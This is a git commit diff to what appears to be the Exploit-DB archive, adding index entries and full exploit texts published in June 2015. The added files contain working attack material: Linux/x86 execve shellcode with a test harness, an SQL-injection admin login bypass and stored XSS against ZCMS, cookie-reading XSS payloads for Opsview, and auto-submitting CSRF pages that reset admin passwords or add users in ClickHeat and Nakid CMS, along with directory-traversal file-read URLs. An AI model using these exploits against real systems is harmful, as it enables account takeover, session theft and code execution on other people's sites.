DB: 2015-06-13
7 new exploits
This commit is contained in:
parent
dc651e3c85
commit
20d0fff830
10 changed files with 721 additions and 15 deletions
|
@ -33612,7 +33612,8 @@ id,file,description,date,author,platform,type,port
|
||||||
37228,platforms/php/webapps/37228.txt,"concrete5 index.php/tools/required/files/add_to searchInstance Parameter XSS",2012-05-20,AkaStep,php,webapps,0
|
37228,platforms/php/webapps/37228.txt,"concrete5 index.php/tools/required/files/add_to searchInstance Parameter XSS",2012-05-20,AkaStep,php,webapps,0
|
||||||
37229,platforms/php/webapps/37229.txt,"concrete5 index.php/tools/required/files/permissions searchInstance Parameter XSS",2012-05-20,AkaStep,php,webapps,0
|
37229,platforms/php/webapps/37229.txt,"concrete5 index.php/tools/required/files/permissions searchInstance Parameter XSS",2012-05-20,AkaStep,php,webapps,0
|
||||||
37230,platforms/php/webapps/37230.txt,"concrete5 index.php/tools/required/dashboard/sitemap_data.php Multiple Parameter XSS",2012-05-20,AkaStep,php,webapps,0
|
37230,platforms/php/webapps/37230.txt,"concrete5 index.php/tools/required/dashboard/sitemap_data.php Multiple Parameter XSS",2012-05-20,AkaStep,php,webapps,0
|
||||||
37248,platforms/php/webapps/37248.txt,"Milw0rm Clone Script v1.0 - (time based) SQLi",2015-06-09,"John Smith",php,webapps,0
|
37248,platforms/php/webapps/37248.txt,"Milw0rm Clone Script 1.0 - (Time Based) SQLi",2015-06-09,Pancaker,php,webapps,0
|
||||||
|
37251,platforms/lin_x86/shellcode/37251.asm,"Linux/x86 - execve /bin/sh shellcode (21 bytes)",2015-06-10,B3mB4m,lin_x86,shellcode,0
|
||||||
37237,platforms/hardware/webapps/37237.txt,"D-Link DSL-2780B DLink_1.01.14 - Unauthenticated Remote DNS Change",2015-06-08,"Todor Donev",hardware,webapps,0
|
37237,platforms/hardware/webapps/37237.txt,"D-Link DSL-2780B DLink_1.01.14 - Unauthenticated Remote DNS Change",2015-06-08,"Todor Donev",hardware,webapps,0
|
||||||
37238,platforms/hardware/webapps/37238.txt,"TP-Link ADSL2+ TD-W8950ND - Unauthenticated Remote DNS Change",2015-06-08,"Todor Donev",hardware,webapps,0
|
37238,platforms/hardware/webapps/37238.txt,"TP-Link ADSL2+ TD-W8950ND - Unauthenticated Remote DNS Change",2015-06-08,"Todor Donev",hardware,webapps,0
|
||||||
37239,platforms/windows/dos/37239.html,"Microsoft Internet Explorer 11 - Crash PoC",2015-06-08,"Pawel Wylecial",windows,dos,0
|
37239,platforms/windows/dos/37239.html,"Microsoft Internet Explorer 11 - Crash PoC",2015-06-08,"Pawel Wylecial",windows,dos,0
|
||||||
|
@ -33621,6 +33622,7 @@ id,file,description,date,author,platform,type,port
|
||||||
37243,platforms/php/webapps/37243.txt,"Wordpress Wp-ImageZoom 1.1.0 - Multiple Vulnerabilities",2015-06-08,T3N38R15,php,webapps,80
|
37243,platforms/php/webapps/37243.txt,"Wordpress Wp-ImageZoom 1.1.0 - Multiple Vulnerabilities",2015-06-08,T3N38R15,php,webapps,80
|
||||||
37244,platforms/php/webapps/37244.txt,"Wordpress Plugin 'WP Mobile Edition' - LFI Vulnerability",2015-06-08,"Ali Khalil",php,webapps,0
|
37244,platforms/php/webapps/37244.txt,"Wordpress Plugin 'WP Mobile Edition' - LFI Vulnerability",2015-06-08,"Ali Khalil",php,webapps,0
|
||||||
37245,platforms/php/webapps/37245.txt,"Pasworld detail.php - Blind Sql Injection Vulnerability",2015-06-08,"Sebastian khan",php,webapps,0
|
37245,platforms/php/webapps/37245.txt,"Pasworld detail.php - Blind Sql Injection Vulnerability",2015-06-08,"Sebastian khan",php,webapps,0
|
||||||
|
37266,platforms/php/webapps/37266.txt,"ClickHeat <= 1.14 Change Admin Password CSRF",2015-06-12,"David Shanahan",php,webapps,80
|
||||||
37249,platforms/linux/dos/37249.py,"Libmimedir VCF Memory Corruption PoC",2015-06-10,"Jeremy Brown",linux,dos,0
|
37249,platforms/linux/dos/37249.py,"Libmimedir VCF Memory Corruption PoC",2015-06-10,"Jeremy Brown",linux,dos,0
|
||||||
37250,platforms/xml/webapps/37250.txt,"HP WebInspect <= 10.4 XML External Entity Injection",2015-06-10,"Jakub Palaczynski",xml,webapps,0
|
37250,platforms/xml/webapps/37250.txt,"HP WebInspect <= 10.4 XML External Entity Injection",2015-06-10,"Jakub Palaczynski",xml,webapps,0
|
||||||
37256,platforms/multiple/webapps/37256.txt,"Heroku Bug Bounty #2 - (API) Re Auth Session Bypass Vulnerability",2015-06-10,Vulnerability-Lab,multiple,webapps,0
|
37256,platforms/multiple/webapps/37256.txt,"Heroku Bug Bounty #2 - (API) Re Auth Session Bypass Vulnerability",2015-06-10,Vulnerability-Lab,multiple,webapps,0
|
||||||
|
@ -33633,3 +33635,8 @@ id,file,description,date,author,platform,type,port
|
||||||
37263,platforms/php/webapps/37263.txt,"AnimaGallery 2.6 - Local File Inclusion",2015-06-10,d4rkr0id,php,webapps,80
|
37263,platforms/php/webapps/37263.txt,"AnimaGallery 2.6 - Local File Inclusion",2015-06-10,d4rkr0id,php,webapps,80
|
||||||
37264,platforms/php/webapps/37264.txt,"WordPress Encrypted Contact Form Plugin 1.0.4 - CSRF Vulnerability",2015-06-10,"Nitin Venkatesh",php,webapps,80
|
37264,platforms/php/webapps/37264.txt,"WordPress Encrypted Contact Form Plugin 1.0.4 - CSRF Vulnerability",2015-06-10,"Nitin Venkatesh",php,webapps,80
|
||||||
37265,platforms/linux/local/37265.txt,"OSSEC 2.7 <= 2.8.1 - Local Root Escalation",2015-06-11,"Andrew Widdersheim",linux,local,0
|
37265,platforms/linux/local/37265.txt,"OSSEC 2.7 <= 2.8.1 - Local Root Escalation",2015-06-11,"Andrew Widdersheim",linux,local,0
|
||||||
|
37270,platforms/php/webapps/37270.txt,"Nakid CMS - Multiple Vulnerabilities",2015-06-12,"John Page",php,webapps,80
|
||||||
|
37271,platforms/multiple/webapps/37271.txt,"Opsview <= 4.6.2 - Multiple XSS Vulnerabilities",2015-06-12,"Dolev Farhi",multiple,webapps,80
|
||||||
|
37272,platforms/jsp/webapps/37272.txt,"ZCMS 1.1 - Multiple Vulnerabilities",2015-06-12,"John Page",jsp,webapps,0
|
||||||
|
37274,platforms/php/webapps/37274.txt,"WordPress SE HTML5 Album Audio Player 1.1.0 - Directory Traversal",2015-06-12,"Larry W. Cashdollar",php,webapps,80
|
||||||
|
37275,platforms/php/webapps/37275.txt,"WordPress Aviary Image Editor Add On For Gravity Forms 3.0 Beta Shell Upload",2015-06-12,"Larry W. Cashdollar",php,webapps,80
|
||||||
|
|
Can't render this file because it is too large.
|
137
platforms/jsp/webapps/37272.txt
Executable file
137
platforms/jsp/webapps/37272.txt
Executable file
|
@ -0,0 +1,137 @@
|
||||||
|
# Exploit Title: SQL Injection & Persistent XSS
|
||||||
|
# Google Dork: intitle: SQL Injection & Persistent XSS
|
||||||
|
# Date: 2015-06-12
|
||||||
|
# Exploit Author: John Page ( hyp3rlinx )
|
||||||
|
# Website: hyp3rlinx.altervista.org
|
||||||
|
# Vendor Homepage: zencherry.com
|
||||||
|
# Software Link: sourceforge.net/projects/zencherrycms
|
||||||
|
# Version: 1.1
|
||||||
|
# Tested on: windows 7 on Apache Tomcat
|
||||||
|
# Category: webapps
|
||||||
|
|
||||||
|
|
||||||
|
Vendor:
|
||||||
|
=============================================
|
||||||
|
http://zencherry.com/
|
||||||
|
http://sourceforge.net/projects/zencherrycms
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
Product:
|
||||||
|
==================================================
|
||||||
|
ZCMS 1.1 JavaServer Pages Content Management System
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
Advisory Information:
|
||||||
|
==============================
|
||||||
|
SQL Injection & Persistent XSS
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
Vulnerability Details:
|
||||||
|
======================
|
||||||
|
SQL Injection:
|
||||||
|
Login to admin area requires a password but is easily bypassed
|
||||||
|
using classic SQLInjection method because application uses
|
||||||
|
concatenated user input to construct SQL queries.
|
||||||
|
|
||||||
|
|
||||||
|
ZCMS exploitable admin login code:
|
||||||
|
==================================
|
||||||
|
squerry="SELECT COUNT(username) AS usercount FROM "+TABLE_PREFIX+"users
|
||||||
|
WHERE
|
||||||
|
status = 0 AND username = '"+username+"' AND password =
|
||||||
|
'"+request.getParameter("pass") +"' AND type = 1 ;";
|
||||||
|
|
||||||
|
|
||||||
|
So we just supply an Admin password like ---> HELL' OR '2'='2
|
||||||
|
which will resolve as true!
|
||||||
|
|
||||||
|
|
||||||
|
SQL Inject XSS Payload:
|
||||||
|
=======================
|
||||||
|
We can also inject persisten XSS payload directly to MySQL database
|
||||||
|
subverting
|
||||||
|
all character filtering leveraging existing SQLInjection vulnerabilities.
|
||||||
|
|
||||||
|
|
||||||
|
Persistent XSS:
|
||||||
|
===============
|
||||||
|
|
||||||
|
Another persistent XSS vector is here in author field for comments:
|
||||||
|
http://localhost:8081/ZCMS_1.1/ZCMS_1.1/index.jsp?dir=editpost&p=[page
|
||||||
|
number]
|
||||||
|
|
||||||
|
|
||||||
|
Exploit code(s):
|
||||||
|
===============
|
||||||
|
|
||||||
|
1) Bypass admin login
|
||||||
|
---------------------
|
||||||
|
localhost:8081/ZCMS_1.1/ZCMS_1.1/?dir=login
|
||||||
|
Enter 'admin' for username field
|
||||||
|
Enter HELL' OR '2'='2 for the pass field
|
||||||
|
|
||||||
|
|
||||||
|
2) Inject XSS using SQL Injection
|
||||||
|
---------------------------------
|
||||||
|
http://localhost:8081/ZCMS_1.1/ZCMS_1.1/?dir=editpost&p=1&title=
|
||||||
|
"<script>alert(1)</script>
|
||||||
|
&content=<script>alert(1)</script>&author=<script>alert(1)</script>
|
||||||
|
SATAN&visibility=1&type=1&comm=0
|
||||||
|
|
||||||
|
|
||||||
|
3) Persistent XSS field
|
||||||
|
-----------------------
|
||||||
|
http://localhost:8081/ZCMS_1.1/ZCMS_1.1/index.jsp?dir=editpost&p=[page
|
||||||
|
number]
|
||||||
|
Inject <script>alert(666)</script> in author input field.
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
Disclosure Timeline:
|
||||||
|
=========================================================
|
||||||
|
Vendor Notification: NA
|
||||||
|
June 12, 2015 : Public Disclosure
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
Severity Level:
|
||||||
|
=========================================================
|
||||||
|
High
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
Description:
|
||||||
|
==========================================================
|
||||||
|
|
||||||
|
Request Method(s): [+] GET & POST
|
||||||
|
|
||||||
|
|
||||||
|
Vulnerable Product: [+] ZCMS_1.1
|
||||||
|
|
||||||
|
|
||||||
|
Vulnerable Parameter(s): [+] pass, title, content, author
|
||||||
|
|
||||||
|
|
||||||
|
Affected Area(s): [+] Admin, CMS
|
||||||
|
|
||||||
|
|
||||||
|
===============================================================
|
||||||
|
|
||||||
|
[+] Disclaimer
|
||||||
|
Permission is hereby granted for the redistribution of this advisory,
|
||||||
|
provided that
|
||||||
|
it is not altered except by reformatting it, and that due credit is given.
|
||||||
|
Permission is
|
||||||
|
explicitly given for insertion in vulnerability databases and similar,
|
||||||
|
provided that
|
||||||
|
due credit is given to the author. The author is not responsible for any
|
||||||
|
misuse of the
|
||||||
|
information contained herein and prohibits any malicious use of all
|
||||||
|
security related
|
||||||
|
information or exploits by the author or elsewhere.
|
||||||
|
|
||||||
|
|
||||||
|
(hyp3rlinx)
|
29
platforms/lin_x86/shellcode/37251.asm
Executable file
29
platforms/lin_x86/shellcode/37251.asm
Executable file
|
@ -0,0 +1,29 @@
|
||||||
|
Linux/x86 execve /bin/sh shellcode 21 bytes
|
||||||
|
|
||||||
|
|
||||||
|
#Greetz : KnocKout,curtis,Bomberman(Leader)
|
||||||
|
#Author : B3mB4m
|
||||||
|
|
||||||
|
Disassembly of section .text:
|
||||||
|
|
||||||
|
08048060 <.text>:
|
||||||
|
8048060: 31 c0 xor %eax,%eax
|
||||||
|
8048062: 50 push %eax
|
||||||
|
8048063: 68 2f 2f 73 68 push $0x68732f2f
|
||||||
|
8048068: 68 2f 62 69 6e push $0x6e69622f
|
||||||
|
804806d: 89 e3 mov %esp,%ebx
|
||||||
|
804806f: 89 c2 mov %eax,%edx
|
||||||
|
8048071: b0 0b mov $0xb,%al
|
||||||
|
8048073: cd 80 int $0x80
|
||||||
|
|
||||||
|
|
||||||
|
#include <stdio.h>
|
||||||
|
#include <string.h>
|
||||||
|
|
||||||
|
char *shellcode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc2\xb0\x0b\xcd\x80";
|
||||||
|
|
||||||
|
int main(void){
|
||||||
|
fprintf(stdout,"Length: %d\n",strlen(shellcode));
|
||||||
|
(*(void(*)()) shellcode)();}
|
||||||
|
|
||||||
|
# Length: 21 PWNED !
|
|
@ -59,7 +59,7 @@
|
||||||
#define PATH "/usr/local/bin/terminatorX"
|
#define PATH "/usr/local/bin/terminatorX"
|
||||||
#define RET 0xbffff69e
|
#define RET 0xbffff69e
|
||||||
|
|
||||||
char shellcode[] "\x31\xc0\x50\x68//sh\x68/bin\x89\xe3"
|
char shellcode[]= "\x31\xc0\x50\x68//sh\x68/bin\x89\xe3"
|
||||||
"\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80";
|
"\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80";
|
||||||
|
|
||||||
char *buffer,*ptr;
|
char *buffer,*ptr;
|
||||||
|
@ -234,6 +234,6 @@ main(int argc,char *argv[])
|
||||||
|
|
||||||
return 0;
|
return 0;
|
||||||
}
|
}
|
||||||
|
|
||||||
|
|
||||||
// milw0rm.com [2003-11-13]
|
// milw0rm.com [2003-11-13]
|
||||||
|
|
68
platforms/multiple/webapps/37271.txt
Executable file
68
platforms/multiple/webapps/37271.txt
Executable file
|
@ -0,0 +1,68 @@
|
||||||
|
# Exploit title: Opsview 4.6.2 - Multiple XSS
|
||||||
|
# Date: 07-06-2015
|
||||||
|
# Vendor homepage: www.opsview.com
|
||||||
|
# Version: 4.6.2
|
||||||
|
# CVE: CVE-2015-4420
|
||||||
|
# Author: Dolev Farhi @dolevf
|
||||||
|
# Tested On: Kali Linux + Windows 7
|
||||||
|
|
||||||
|
# Details:
|
||||||
|
# --------
|
||||||
|
# Opsview is a monitoring system based on Nagios Core. Opsview is prone to several stored and reflected XSS vulnerabilities in the latest version
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
1. Stored XSS through a malicious check plugin
|
||||||
|
|
||||||
|
a. Create a plugin with the following content:
|
||||||
|
|
||||||
|
#!/bin/bash
|
||||||
|
echo '<script>alert("script0t0s")</script>'
|
||||||
|
exit 2
|
||||||
|
|
||||||
|
b. create a new check and assign this plugin.
|
||||||
|
|
||||||
|
c. once a host uses this check, navigate to the event page, the XSS will be injected.
|
||||||
|
|
||||||
|
d. once a user/admin acknowledges this critical event (exit 2), the code will be injected prior his acknowledgement.
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
2. Stored XSS in host profile
|
||||||
|
|
||||||
|
a. add a host
|
||||||
|
|
||||||
|
b. in the description of the host, add a description as the one below:
|
||||||
|
<script>alert(document.cookie)</script>
|
||||||
|
|
||||||
|
c. save settings
|
||||||
|
|
||||||
|
d. once a user/admin views the host settings, XSS will be injected.
|
||||||
|
|
||||||
|
|
||||||
|
3. Reflected XSS in Test service check page.
|
||||||
|
a. Add a new service check
|
||||||
|
|
||||||
|
b. Test the new service check against any host and provide in the command line the following <script>alert("test")</script>
|
||||||
|
|
||||||
|
c. the XSS will immediately reflect to the screen.
|
||||||
|
|
||||||
|
response output:
|
||||||
|
|
||||||
|
POST /state/service/166/exec HTTP/1.1
|
||||||
|
Host: 192.168.0.20
|
||||||
|
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.4.0
|
||||||
|
Accept: text/plain, */*; q=0.01
|
||||||
|
Accept-Language: en-US,en;q=0.5
|
||||||
|
Accept-Encoding: gzip, deflate
|
||||||
|
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
||||||
|
X-Requested-With: XMLHttpRequest
|
||||||
|
Referer: http://192.168.0.20/status/service?host_state=0&host_filter=handled&host=opsview
|
||||||
|
Content-Length: 105
|
||||||
|
Cookie: PHPSESSID=
|
||||||
|
auth_tkt=
|
||||||
|
Connection: keep-alive
|
||||||
|
Pragma: no-cache
|
||||||
|
Cache-Control: no-cache
|
||||||
|
|
||||||
|
plugin_args=%3Cscript%3Ealert(%22opsview%22)%3C%2Fscript%3E&_CSRFToken=0x84BCDAD00D5111E5988CB34E7AFD915
|
|
@ -103,13 +103,3 @@ ___________ ____ ____ _____ | | __ ___________
|
||||||
| __(____ /___| /\___ >____ /__|_ \\___ >__|
|
| __(____ /___| /\___ >____ /__|_ \\___ >__|
|
||||||
|__| \/ \/ \/ \/ \/ \/
|
|__| \/ \/ \/ \/ \/ \/
|
||||||
.........................cant be pr0 without ascii art
|
.........................cant be pr0 without ascii art
|
||||||
|
|
||||||
|
|
||||||
Den tisdag, 9 juni 2015 8:17 skrev john smith <pancaker_1338@yahoo.se>:
|
|
||||||
|
|
||||||
|
|
||||||
sir - y u no pub?https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4137
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
51
platforms/php/webapps/37266.txt
Executable file
51
platforms/php/webapps/37266.txt
Executable file
|
@ -0,0 +1,51 @@
|
||||||
|
# Exploit Title: ClickHeat <1.1.4 Change Admin Password CSRF
|
||||||
|
# Google Dork: allinurl:/clickheat/
|
||||||
|
# Date: 11-06-2015
|
||||||
|
# Exploit Author: David Shanahan (@CyberpunkSec)
|
||||||
|
# Contact: https://twitter.com/CyberpunkSec
|
||||||
|
# Vendor Homepage: http://www.labsmedia.com/clickheat/index.html
|
||||||
|
# Software Link: http://sourceforge.net/projects/clickheat/files/clickheat/
|
||||||
|
# Version: 1.14
|
||||||
|
# Tested on: Windows
|
||||||
|
|
||||||
|
---- Description ----
|
||||||
|
|
||||||
|
ClickHeat is vulnerable to a CSRF attack because it does not implement a
|
||||||
|
CSRF token when updating the config file. If an authenticated admin is
|
||||||
|
tricked into opening this malicious URL, the form will be submitted which
|
||||||
|
changes the administrator password to the one the attacker has specified.
|
||||||
|
|
||||||
|
---- CSRF PoC ----
|
||||||
|
|
||||||
|
Set the value of "adminLogin" to the administrators username, then set the
|
||||||
|
value of "adminPass" to a md5 hash of the password you want. (you may also
|
||||||
|
need to change the "logPath" & "cachePath")
|
||||||
|
|
||||||
|
/* CODE */
|
||||||
|
|
||||||
|
<body onload="document.forms[0].submit()">
|
||||||
|
|
||||||
|
<form action="http://127.0.0.1/clickheat/index.php?action=config"
|
||||||
|
method="post" class="center">
|
||||||
|
<input type="hidden" name="config" value="a:23:{s:7:"logPath";s:31:"C:/xampp
|
||||||
|
/htdocs/clickheat/logs/";s:9:"cachePath";s:32:"C:/xampp/htdocs/clickheat
|
||||||
|
/cache/";s:8:"referers";b:0;s:6:"groups";b:0;s:8:"filesize";i:0;s:10:"
|
||||||
|
adminLogin";s:5:"admin";s:9:"adminPass";s:32:"
|
||||||
|
5f4dcc3b5aa765d61d8327deb882cf99";s:11:"viewerLogin";s:0:"";s:10:"viewerPass
|
||||||
|
";s:0:"";s:6:"memory";i:128;s:4:"step";i:5;s:3:"dot";i:19;s:5:"flush";i:40;s:5:"start";s:1:"m";s:7:"palette";b:0;s:7:"
|
||||||
|
heatmap";b:1;s:11:"hideIframes";b:1;s:11:"hideFlashes
|
||||||
|
";b:1;s:9:"yesterday";b:0;s:5:"alpha";i:80;s:13:"__screenSizes
|
||||||
|
";a:10:{i:0;i:0;i:1;i:240;i:2;i:640;i:3;i:800;i:4;i:1024;i:5;i:1152;i:6;i:1280;i:7;i:1440;i:8;i:1600;i:9;i:1800;}s:14:"__
|
||||||
|
browsersList";a:7:{s:3:"all";s:0:"";s:4:"msie";s:17:"Internet
|
||||||
|
Explorer";s:7:"firefox";s:7:"Firefox";s:6:"chrome";s:6:"Chrome";s:6:"safari";s:6:"Safari";s:5:"opera";s:5:"Opera";s:7:"unknown";s:0:"";}s:7:"version";s:4:"1.14";}"
|
||||||
|
/>
|
||||||
|
<input type="hidden" name="save" value="true" /><input type="submit"
|
||||||
|
value="Save configuration" /></form>
|
||||||
|
|
||||||
|
/* CODE */
|
||||||
|
|
||||||
|
---- Solution ----
|
||||||
|
|
||||||
|
The ClickHeat project seems to be dead, as it has not been updated since
|
||||||
|
late 2011. Due to this, I truly doubt a patch will be issued so I would
|
||||||
|
recommend removing this product from your website.
|
284
platforms/php/webapps/37270.txt
Executable file
284
platforms/php/webapps/37270.txt
Executable file
|
@ -0,0 +1,284 @@
|
||||||
|
# Exploit Title: CSRF, Persistent XSS & LFI
|
||||||
|
# Google Dork: intitle: CSRF, Persistent XSS & LFI
|
||||||
|
# Date: 2015-06-11
|
||||||
|
# Exploit Author: John Page ( hyp3rlinx )
|
||||||
|
# Website: hyp3rlinx.altervista.org
|
||||||
|
# Vendor Homepage: kilrizzy.github.io/Nakid-CMS
|
||||||
|
# Software Link: kilrizzy.github.io/Nakid-CMS
|
||||||
|
# Version: kilrizzy-Nakid-CMS-f274624
|
||||||
|
# Tested on: windows 7 on XAMPP
|
||||||
|
# Category: webapps
|
||||||
|
|
||||||
|
|
||||||
|
Vendor:
|
||||||
|
================================
|
||||||
|
http://kilrizzy.github.io/Nakid-CMS/
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
Product:
|
||||||
|
================================
|
||||||
|
kilrizzy-Nakid-CMS-f274624
|
||||||
|
Nakid CMS is an open source content management system built using PHP and
|
||||||
|
CodeIgniter.
|
||||||
|
|
||||||
|
|
||||||
|
Setup mode:
|
||||||
|
==========
|
||||||
|
Under root dir for Nakid CMS we set to production mode instead of
|
||||||
|
development in index.php.
|
||||||
|
e.g. define('ENVIRONMENT', 'production');
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
Advisory Information:
|
||||||
|
================================================
|
||||||
|
CSRF, Persistent XSS & Auth bypass LFI
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
Vulnerability Details:
|
||||||
|
=====================
|
||||||
|
Multiple CSRF(s) exist:
|
||||||
|
|
||||||
|
We have ability to do the following as no CSRF tokens are present.
|
||||||
|
|
||||||
|
1-Change Admin password
|
||||||
|
2-Add arbitrary users to system
|
||||||
|
3-Alter system settings
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
XSS (persistent):
|
||||||
|
XSS parameter vulnerabilities exist for the following:
|
||||||
|
payloads will be stored in the MySQL database and activated when a victim
|
||||||
|
visits the vulnerable webpage.
|
||||||
|
|
||||||
|
|
||||||
|
XSS URL:
|
||||||
|
--------
|
||||||
|
http://localhost/kilrizzy-Nakid-CMS-f274624/kilrizzy-Nakid-CMS-f274624/index.php/system/users
|
||||||
|
On the "Edit Record" pop up dialog box.
|
||||||
|
|
||||||
|
|
||||||
|
Vulnerable parameters:
|
||||||
|
---------------------
|
||||||
|
username
|
||||||
|
password
|
||||||
|
email
|
||||||
|
fname
|
||||||
|
lname
|
||||||
|
|
||||||
|
|
||||||
|
XSS URL:
|
||||||
|
--------
|
||||||
|
http://localhost/kilrizzy-Nakid-CMS-f274624/kilrizzy-Nakid-CMS-f274624/index.php/system/settings
|
||||||
|
On the "Edit Record" pop up dialog box.
|
||||||
|
|
||||||
|
|
||||||
|
Vulnerable parameters:
|
||||||
|
---------------------
|
||||||
|
from_name
|
||||||
|
include_path
|
||||||
|
primary_email
|
||||||
|
from_email
|
||||||
|
|
||||||
|
|
||||||
|
XSS URL:
|
||||||
|
--------
|
||||||
|
http://localhost/kilrizzy-Nakid-CMS-f274624/kilrizzy-Nakid-CMS-f274624/index.php/system/content_edit/1
|
||||||
|
|
||||||
|
Vulnerable parameter:
|
||||||
|
--------------------
|
||||||
|
title
|
||||||
|
|
||||||
|
|
||||||
|
Authentication bypass LFI:
|
||||||
|
Local file inclusion to bypass access controls and read aribitrary files
|
||||||
|
exist by setting '$url' PHP variable on following URL
|
||||||
|
|
||||||
|
index.php/connector$url
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
Exploit POC code(s):
|
||||||
|
====================
|
||||||
|
|
||||||
|
CSRF(s):
|
||||||
|
========
|
||||||
|
|
||||||
|
Condition:
|
||||||
|
Pursuade victim to visit our webpage or click our link, if they have a
|
||||||
|
session then we do our CSRF!.
|
||||||
|
|
||||||
|
|
||||||
|
1- Add arbitrary user to system
|
||||||
|
--------------------------------
|
||||||
|
|
||||||
|
<!DOCTYPE>
|
||||||
|
<html>
|
||||||
|
<head>
|
||||||
|
<script>
|
||||||
|
function doit(){
|
||||||
|
var e=document.getElementById('ruinurlife')
|
||||||
|
e.submit()
|
||||||
|
}
|
||||||
|
</script>
|
||||||
|
</head>
|
||||||
|
<body onLoad="doit()">
|
||||||
|
<form id="ruinurlife" action="
|
||||||
|
http://localhost/kilrizzy-Nakid-CMS-f274624/kilrizzy-Nakid-CMS-f274624/index.php/grid/users"
|
||||||
|
method="post">
|
||||||
|
<input type="text" name="username" value="sum1" />
|
||||||
|
<input type="text" name="password" value="abc123" />
|
||||||
|
<input type="text" name="email" value="X@X.com"/>
|
||||||
|
<input type="text" name="fname" value="sum"/>
|
||||||
|
<input type="text" name="lname" value="1"/>
|
||||||
|
<input type="text" name="oper" value="add"/>
|
||||||
|
<input type="text" name="id" value="_empty"/>
|
||||||
|
</form>
|
||||||
|
</body>
|
||||||
|
</html>
|
||||||
|
|
||||||
|
|
||||||
|
2-Change Admin password
|
||||||
|
------------------------
|
||||||
|
|
||||||
|
<!DOCTYPE>
|
||||||
|
<html>
|
||||||
|
<head>
|
||||||
|
<script>
|
||||||
|
function doit(){
|
||||||
|
var e=document.getElementById('ruinurlife')
|
||||||
|
e.submit()
|
||||||
|
}
|
||||||
|
</script>
|
||||||
|
</head>
|
||||||
|
<body onLoad="doit()">
|
||||||
|
<form id="ruinurlife" action="
|
||||||
|
http://localhost/kilrizzy-Nakid-CMS-f274624/kilrizzy-Nakid-CMS-f274624/index.php/system/profile"
|
||||||
|
method="post">
|
||||||
|
<input type="text" name="username" value="admin" />
|
||||||
|
<input type="text" name="password" value="xyz123" />
|
||||||
|
<input type="text" name="email" value="hell@abyss.com"/>
|
||||||
|
<input type="text" name="fname" value="hyp3r"/>
|
||||||
|
<input type="text" name="lname" value="linx"/>
|
||||||
|
<input type="text" name="action" value="edit_profile"/>
|
||||||
|
<input type="text" name="submitbt" value="Save"/>
|
||||||
|
</form>
|
||||||
|
</body>
|
||||||
|
</html>
|
||||||
|
|
||||||
|
|
||||||
|
3-Alter system settings
|
||||||
|
-----------------------
|
||||||
|
|
||||||
|
<!DOCTYPE>
|
||||||
|
<html>
|
||||||
|
<head>
|
||||||
|
<script>
|
||||||
|
function doit(){
|
||||||
|
var e=document.getElementById('ruinurlife')
|
||||||
|
e.submit()
|
||||||
|
}
|
||||||
|
</script>
|
||||||
|
</head>
|
||||||
|
<body onLoad="doit()">
|
||||||
|
<form id="ruinurlife" action="
|
||||||
|
http://localhost/kilrizzy-Nakid-CMS-f274624/kilrizzy-Nakid-CMS-f274624/index.php/grid/settings"
|
||||||
|
method="post">
|
||||||
|
<input type="text" name="value" value="HELL@ABYSS.com" />
|
||||||
|
<input type="text" name="oper" value="edit" />
|
||||||
|
<input type="text" name="id" value="1"/>
|
||||||
|
</form>
|
||||||
|
</body>
|
||||||
|
</html>
|
||||||
|
|
||||||
|
|
||||||
|
XSS persistent POC code:
|
||||||
|
=======================
|
||||||
|
|
||||||
|
Inject <script>alert(666)</script> into any of the following vulnerable
|
||||||
|
fields described above using POST method.
|
||||||
|
Need to highlight a row then click edit dialog box to edit settings.
|
||||||
|
|
||||||
|
e.g.
|
||||||
|
|
||||||
|
http://localhost/kilrizzy-Nakid-CMS-f274624/kilrizzy-Nakid-CMS-f274624/index.php/system/settings
|
||||||
|
|
||||||
|
from_name <------- <script>alert(666)</script>
|
||||||
|
include_path
|
||||||
|
primary_email
|
||||||
|
from_email
|
||||||
|
|
||||||
|
|
||||||
|
Authorization bypass LFI:
|
||||||
|
========================
|
||||||
|
|
||||||
|
1- Logout, create a hell.txt file or whatever and put in 'htdocs' or web
|
||||||
|
root, then visit the URL (change to suit your environment).
|
||||||
|
|
||||||
|
2-
|
||||||
|
http://localhost/kilrizzy-Nakid-CMS-f274624/kilrizzy-Nakid-CMS-f274624/index.php/connector$url=../../../../../../../hell.txt
|
||||||
|
|
||||||
|
OR try
|
||||||
|
|
||||||
|
http://localhost/kilrizzy-Nakid-CMS-f274624/kilrizzy-Nakid-CMS-f274624/index.php/connector$url=../../../../../../xampp/phpinfo.php
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
Disclosure Timeline:
|
||||||
|
=========================================================
|
||||||
|
Vendor Notification: NA
|
||||||
|
June 11, 2015 : Public Disclosure
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
Severity Level:
|
||||||
|
=========================================================
|
||||||
|
High
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
Description:
|
||||||
|
==========================================================
|
||||||
|
|
||||||
|
Request Method(s): [+] GET & POST
|
||||||
|
|
||||||
|
|
||||||
|
Vulnerable Product: [+] kilrizzy-Nakid-CMS-f274624
|
||||||
|
|
||||||
|
|
||||||
|
Vulnerable Parameter(s): [+]
|
||||||
|
username
|
||||||
|
password
|
||||||
|
email
|
||||||
|
fname
|
||||||
|
lname
|
||||||
|
from_name
|
||||||
|
include_path
|
||||||
|
primary_email
|
||||||
|
